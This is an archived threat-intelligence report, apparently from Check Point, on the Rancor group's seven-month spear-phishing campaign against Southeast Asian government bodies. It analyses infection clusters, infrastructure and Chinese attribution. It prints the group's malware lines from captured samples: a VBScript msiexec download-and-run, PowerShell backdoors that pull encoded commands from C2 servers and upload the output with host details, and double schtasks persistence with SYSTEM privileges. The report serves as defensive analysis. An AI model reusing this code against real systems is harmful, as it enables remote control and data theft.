{
	"id": "e3686d48-4bc5-4ea1-898d-0d49e2693086",
	"created_at": "2026-04-20T02:21:29.307796Z",
	"updated_at": "2026-04-20T02:22:27.781666Z",
	"deleted_at": null,
	"sha1_hash": "72fd9c6eb05ac339aace5c8771b6da7ef8de688b",
	"title": "Rancor: The Year of The Phish",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 120834,
	"plain_text": "Rancor: The Year of The Phish\r\nBy Yaroslav Harakhavik\r\nPublished: 2019-09-22 · Archived: 2026-04-20 02:19:04 UTC\r\nEarlier this year, Check Point researchers identified a targeted and extensive attack against Southeast Asian\r\ngovernment entities over the span of 7 months. The attackers, which we believe are members of the Rancor threat\r\ngroup, used classic spear-phishing to reach their victims, but invested much of their effort into making the\r\ne-mails and lure documents appear as convincing as possible, and into changing their TTPs over time.\r\nRancor is a threat group active since at least 2017, and was previously observed carrying out attacks against Singapore and\r\nCambodia, which are believed to be espionage motivated.\r\nIn this report, we will provide a deep-dive analysis of the initial attack methods, infrastructure, and artifacts used\r\nagainst the targets in the latest campaign we discovered and attributed to this group. In addition, we will share\r\nsome insights that might indicate the Rancor APT group is of Chinese origin.\r\nMain Findings\r\nThe observed attacks started with e-mails sent on behalf of employees from different government departments,\r\nembassies, or government-related entities in a Southeast Asian country. The attackers appeared determined to\r\nreach certain targets, as tens of e-mails were sent to employees under the same ministries. Furthermore, the e-mails’ origin was likely spoofed to make them seem more reliable.\r\nFig 1: Main findings\r\nInfection Flow\r\nhttps://research.checkpoint.com/2019/rancor-the-year-of-the-phish/\r\nPage 1 of 16\n\nThis extensive, persistent campaign, which was ongoing for more than 7 months, continued to evolve over time,\r\nmutating its TTPs, which at times even appeared unrelated until extended analysis.\r\n
Though hundreds of files were\r\ninvolved in these attacks, the following flow-chart summarizes most of the attack combinations\r\nobserved throughout the campaign:\r\nFig 2: Infection flow\r\nDecoy Documents\r\nThe delivery documents relied on macros and known vulnerabilities to run malicious code on the infected system.\r\nWhat was most interesting about them, however, was the decoy content they used. Most of the documents\r\ncontained legitimate government-related topics, such as instructions for governmental employees, official letters,\r\npress releases, surveys, and more.\r\nExample:\r\nFig 3: Legitimate-looking decoy document\r\nClusters of TTPs\r\nAnalyzing the timeline of the campaign uncovered 8 major variants of TTPs (delivery, persistence and payload) in\r\ndifferent combinations. Each mini-campaign was not limited to a single target, and the attackers went after\r\nmultiple government entities simultaneously, using the same TTPs. Below is a summary of each such cluster, and\r\nthe time range in which it was observed:\r\n1st Cluster: December 2018\r\nFig 4: 1st cluster infection chain\r\nThe earliest documents observed in December 2018 and attributed to this campaign contained a short macro that\r\nexecuted the value found under the Company field in the document’s properties:\r\nFig 5: Commands hidden in the document metadata\r\nThe command in the Company field saves a VBScript file to the temp directory, and schedules a task to run it\r\nevery two minutes.\r\n
The VBS file simply downloads a second-stage MSI payload from the attacker’s server and\r\nexecutes it using msiexec:\r\nSet a=CreateObject(\"Wscript.Shell\"):a.Run \"msiexec /q /i http://p=/45.125.65[.]76/abc\",0\r\nThe MSI payload (c96c01df9d7eeb60258dcf8ce2ccbb2e78bb5f87) was created using the Advanced Installer tool,\r\nwhich allows wrapping a PowerShell script into an MSI installer. This script receives instructions from the C\u0026C\r\nserver, and uploads the execution result along with the user machine information:\r\ntry{\r\n $client = New-Object System.Net.WebClient;\r\n $parameters = New-Object Collections.Specialized.NameValueCollection\r\n $commandurl = 'http://45.125.65[.]76/postval/sea.txt'\r\n $command = (New-Object System.Net.WebClient).DownloadString($commandurl)\r\n $cmdDecode = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($command))\r\n $rtn = Invoke-Expression $cmdDecode | Out-String\r\n $rtnBase = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($rtn))\r\n $parameters[\"comname\"] = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($env:USE\r\n $parameters[\"id\"]= $rtnBase\r\n $client.UploadValues(\"http://45.125.65[.]76/postval/postval.php\",$parameters)\r\n}catch\r\n{}\r\nBy the time we discovered this sample, the C\u0026C was unreachable and we were unable to download the final-stage\r\npayload, but looking at other files that were hosted on the same C2 led us to a related DLL\r\n(70bdce0f974dd0faac5684e6ca0b3476b8a12564).\r\n
This DLL acts as a loader and tries to download an additional\r\nDLL file from www.chinhphumofa.esmtp[.]biz and execute its RunningThread function (later referred to as the\r\nRunningThread Loader).\r\n2nd Cluster: January, March 2019\r\nFig 6: 2nd cluster infection chain\r\nDuring January and March, the attackers introduced new macro code and the intermediate MSI stage was\r\nremoved. The Document_Open function in the macro contains a base64-encoded blob which is decoded and saved\r\nas a .js file. This time the command to create a scheduled task is executed from the Comments property of the\r\ndocument, and it tries to add the same task with two different permission levels, thus making sure that the inserted task\r\nruns with the higher privileges if available:\r\ncmd /c schtasks /create /sc MINUTE /tn \"Chrome\" /tr \"C:\\Windows\\Tasks\\Chrome.js\" /mo 2 /F \u0026\r\nschtasks /create /sc MINUTE /tn \"Chrome\" /tr \"C:\\Windows\\Tasks\\Chrome.js\" /mo 2 /RU SYSTEM\r\nThe Chrome.js file contains a PowerShell backdoor similar to the one in the previous version.\r\n
In both scheduled\r\ntasks, the name, filename and URL patterns of the C\u0026C communication mimic Google Chrome\r\nupdates:\r\n$r=[System.Net.WebRequest]::Create('http://154.16.37[.]122/GoogleUpdate/Update.php');\r\n$resp=$r.GetResponse();\r\n$respstream=$resp.GetResponseStream();\r\n$sr=new-object System.IO.StreamReader $respstream;\r\n$Cmd=$sr.ReadToEnd();\r\n$Cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($Cmd));\r\n$cmdOut=Invoke-Expression -Command:$Cmd|Out-String;\r\n$ReCmd=[Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($cmdOut));\r\n$uuid=Invoke-Expression -Command:'wmic csproduct get uuid'|Out-String;\r\n$Reuid=[Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($uuid));\r\n$Pusl= 'http://154.16.37[.]122/GoogleUpdate/Google.php?Mac=';\r\n$Pusl=$Pusl+$Reuid;\r\n$Pusl=$Pusl+'?Data=';\r\n$Pusl=$Pusl+$ReCmd;\r\n[System.Net.WebRequest]$webRequest=[System.Net.WebRequest]::Create($Pusl);\r\n$webRequest.Method='POST';\r\n$webRequest.GetResponse();\r\nSimilar URL patterns were seen throughout the campaign.\r\n3rd Cluster: April 2019\r\nFig 7: 3rd cluster infection chain\r\nIn the next wave, the attackers added documents that exploit known vulnerabilities in MS Equation Editor to\r\ntheir arsenal. The documents are created using the known 8.t RTF weaponizer. As soon as the malicious RTF\r\ndocument is opened, the exploit triggers the execution of the 8.t payload, creating two additional files:\r\nC:\\Windows\\tracing\\OneDriveApp.vbs and C:\\Windows\\tracing\\OneDriveApp.ps1.\r\n
As in previous stages, the\r\nPowerShell payload has the same C\u0026C communication functionality and, depending on the sample,\r\nmimics different Google or Microsoft applications.\r\n4th Cluster: May 2019\r\nFig 8: 4th cluster infection chain\r\nThe attack is carried out by RTF documents built with the same MS Equation Editor exploit builder that was used before.\r\nUpon execution, it drops two files into the temp folder: wsc_proxy.exe and wsc.dll. wsc_proxy.exe is a\r\nlegitimate Avast Antivirus executable. Using DLL side-loading, it starts the malicious payload wsc.dll.\r\nThe wsc.dll itself is a loader for another DLL, executing its RunningThread exported function (the same\r\nfunction name seen in cluster 1). This infection chain was previously described by @sebdraven.\r\nDLL side-loading is widely used to evade security products that monitor the behavior of executed files: because the\r\nhosting executables are white-listed, signed or trusted, malware loaded by them may be excluded from\r\nbehavioral monitoring.\r\nClusters 5-8: May-June 2019\r\nFig 9: 5th-8th cluster infection chains\r\nDuring the months of May and June, Rancor continued to introduce new infection chains that are visualized\r\nabove. In one case, the attackers turned to Cobalt Strike Beacon as their second-stage payload.\r\n
In another case,\r\nwhere the legitimate Bitdefender executable was used, it was downloaded from a GitHub account possibly\r\ncreated by the attackers specifically for this campaign:\r\nhttps://raw.githubusercontent[.]com/watchdogmanoo/watcherdog/master/WatchDog.exe\r\nWhen DLL side-loading was used, the malicious DLL was in charge of downloading and executing two additional\r\nplugins, internally named “nbf.plugin” and “nbs.plugin”.\r\nFig 10: GitHub repository used to serve a legitimate Bitdefender executable\r\nConnecting the Clusters\r\nBesides going after the same government targets, we observed a lot of similarities between the different clusters\r\nwe detailed above. Overlapping indicators:\r\nMetadata – For most of the documents, the Author, Operator or Last Modifier properties are one of\r\nthe following:\r\nA\r\nhttp\r\nWindows User\r\nAntiSec\r\nDDNS service – All the domains utilized ChangeIP.com for domain resolution.\r\n“8.t” RTF exploit builder – RTF files were created using the same builder.\r\nVBA Macros – Execution of code stored as a document property.\r\nDLL hijacking – Usage of known AntiVirus executables.\r\nPowerShell code – Receives a command to execute and uploads basic user info.\r\nDouble Schtask – For persistence, a scheduled task command was issued twice.\r\n“RunningThread” loader – Loader utilized in multiple clusters, mentioned above.\r\nEmail spoofing – The emails appeared to be sent from other government officials.\r\nBelow is a visualization of the connections we found between the different clusters:\r\nFig 11: Maltego graph – connecting the clusters\r\nAttribution by Infrastructure\r\nZooming in on the infrastructure connection, we see that the first and fourth versions of the attack (clusters 1 and\r\n4 in the diagram below) can be connected via multiple\r\n
passive DNS hops, or by a Rancor Loader to the C\u0026C\r\ndomain www.chinhphumofa.esmtp[.]biz, which in turn can be connected via passive DNS resolution to the\r\noriginally reported Rancor C\u0026C domain: www.microsoft.https443[.]org\r\nFig 12: Maltego graph – infrastructure connecting to previous campaign\r\nAttribution by Artifacts\r\nSearching for MSI files which encapsulate PowerShell code (as described in Cluster 1) led us to a sample\r\nthat communicated with the IP address 199.247.6[.]253, which is a known C\u0026C used by the Rancor group:\r\nFig 13: PowerShell code connecting to Rancor\r\nAnother similarity to the previous campaign is the creation of scheduled tasks by running the\r\nschtasks command twice to gain execution with SYSTEM privileges if possible. In both cases the scheduled task was set\r\nto execute every 2 minutes:\r\nFig 14: Similarity in scheduled task creation technique\r\nFinally, as in the previous campaign, this campaign used a similar macro code technique in the delivery\r\ndocuments to execute the shell command stored in the Company metadata of the document:\r\nFig 15: Similar macro code\r\nChinese Artifacts\r\nAs Rancor has not been strongly attributed to any origin as of yet, we would like to offer some insights which might\r\ngive an indication that we are looking at a Chinese threat group.\r\nThe 8.t RTF exploit building kit, mentioned above, was reported by Anomali researchers as widely\r\navailable and mostly adopted by Chinese actors.\r\nThe C\u0026C servers were available only between 01:00 – 08:00 UTC, which we believe are the working\r\nhours in the attackers’ country; therefore the range of possible origins of this attack is limited to East Asia.\r\nChinese roots can also be confirmed by the presence of metadata in Chinese for some of the\r\n
documents:\r\nFig 16: Chinese metadata\r\nThe campaign wasn’t active during February 2019, the month of the Chinese New Year and the\r\nSpring Festival, a long holiday in China. Of course, this does not indicate a strong attribution on its own.\r\nFig 17: Activity graph\r\nAnomalies\r\nDuring our analysis, we noticed an interesting sample which might indicate some connection in activity between\r\nthis Rancor campaign and the previous activity by the Goblin Panda group (AKA 1937CN by some vendors). The\r\nsample b49c148db0b4eec53815dd1a2630c63d25cda78e (found on VirusTotal) is an RTF document created by the\r\naforementioned 8.t exploit builder, but utilized a loader which is attributed to the Goblin Panda group. The\r\ninteresting part is that the metadata of the RTF file in question exhibits the same unique Last Modified By\r\ninformation as we’ve seen in our Rancor campaign: “AntiSec”.\r\nFig 18: Anomalous metadata\r\nConclusion\r\nThe Rancor group, which was previously spotted attacking Cambodia and Singapore, continued its targeted attacks\r\nagainst entities within the Southeast Asia region, this time concentrating 7 months of efforts on the Southeast\r\nAsian government sector. Dozens of emails, seemingly sent by government officials and containing politically themed\r\ndecoy documents, were intended to trick victims into opening them and loading malicious components providing\r\nfull access to victims’ machines. During our research we uncovered multiple leads fortifying the assumption that\r\nthe Rancor group activity is indeed of Chinese origin.\r\n
We expect the group to continue to evolve, constantly\r\nchanging their TTPs in the same manner as we observed throughout the campaign, as well as pushing their efforts\r\nto bypass security products and avoid attribution.\r\nCheck Point’s SandBlast\r\nThe malware used in this attack was caught using Check Point’s Threat Emulation and Threat Extraction.\r\nThreat Emulation is an innovative zero-day threat sandboxing capability, used by SandBlast Network to deliver\r\nthe best possible catch rate for threats, and is virtually immune to attackers’ evasion techniques. As part of the\r\nCheck Point SandBlast Zero-Day Protection solution, Threat Emulation prevents infections from new malware\r\nand targeted attacks. The Threat Extraction capability removes exploitable content, including active content and\r\nembedded objects, reconstructs files to eliminate potential threats, and promptly delivers sanitized content to users\r\nto maintain business flow.\r\nAppendix A: IOCs\r\nSource: https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/"
	],
	"report_names": [
		"rancor-the-year-of-the-phish"
	],
	"threat_actors": [],
	"ts_created_at": 1776651689,
	"ts_updated_at": 1776651747,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/72fd9c6eb05ac339aace5c8771b6da7ef8de688b.pdf",
		"text": "https://archive.orkl.eu/72fd9c6eb05ac339aace5c8771b6da7ef8de688b.txt",
		"img": "https://archive.orkl.eu/72fd9c6eb05ac339aace5c8771b6da7ef8de688b.jpg"
	}
}